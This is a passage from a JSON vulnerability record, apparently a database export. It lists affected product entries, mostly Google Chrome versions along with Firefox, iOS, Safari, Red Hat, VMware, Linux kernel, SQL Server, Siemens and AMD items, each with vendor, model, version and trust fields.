        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "38.0.2125.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.40"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.43"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.117"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1076.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.2"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.72"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "14.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.458.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.208"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1682.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.959.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.106"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.27"
      },
      {
        "_id": null,
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.624.0"
      },
      {
        "_id": null,
        "model": "fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "8.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.40"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.156"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.639.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.26"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.0.2"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "42.0.2311.135"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1293.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1654.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.73"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.25"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.38"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.698.0"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1079.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.338"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.71"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.598.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1287.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.30"
      },
      {
        "_id": null,
        "model": "simatic ipc377e",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.894.0"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.3"
      },
      {
        "_id": null,
        "model": "virtualization host",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "4"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.87"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1061"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.906.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.777.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.737.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1284.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.237"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.445.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.214"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.21"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.514.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1444.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1672.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.53"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.1"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "13.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.52"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.10"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "53.0.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.320"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.311"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.693.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.736.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.0"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1069.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1668.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1019.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.606.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.438.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.775.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.62"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.120"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.11"
      },
      {
        "_id": null,
        "model": "kernel",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "linux",
        "version": "4.14.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.43"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.209"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.113"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems service pack",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "201610"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.60"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1299.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.226"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.869.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.738.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "27.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.7"
      },
      {
        "_id": null,
        "model": "fx -8320 eight-core processor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "amd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.102"
      },
      {
        "_id": null,
        "model": "macos supplemental",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "apple",
        "version": "10.13.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.231"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.32"
      },
      {
        "_id": null,
        "model": "enterprise linux eus compute node",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.36"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.18"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.54"
      },
      {
        "_id": null,
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20160"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.98"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.578.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.54"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.63"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.958.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.380.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.21"
      },
      {
        "_id": null,
        "model": "vsphere data protection",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.1.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.25"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.809.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.105"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.50"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.81"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1681.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.361.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1018"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.4.154.22"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.701.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.54"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.780.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.116"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.605.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1051.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.51"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.58"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.49"
      },
      {
        "_id": null,
        "model": "enterprise linux desktop",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.32"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
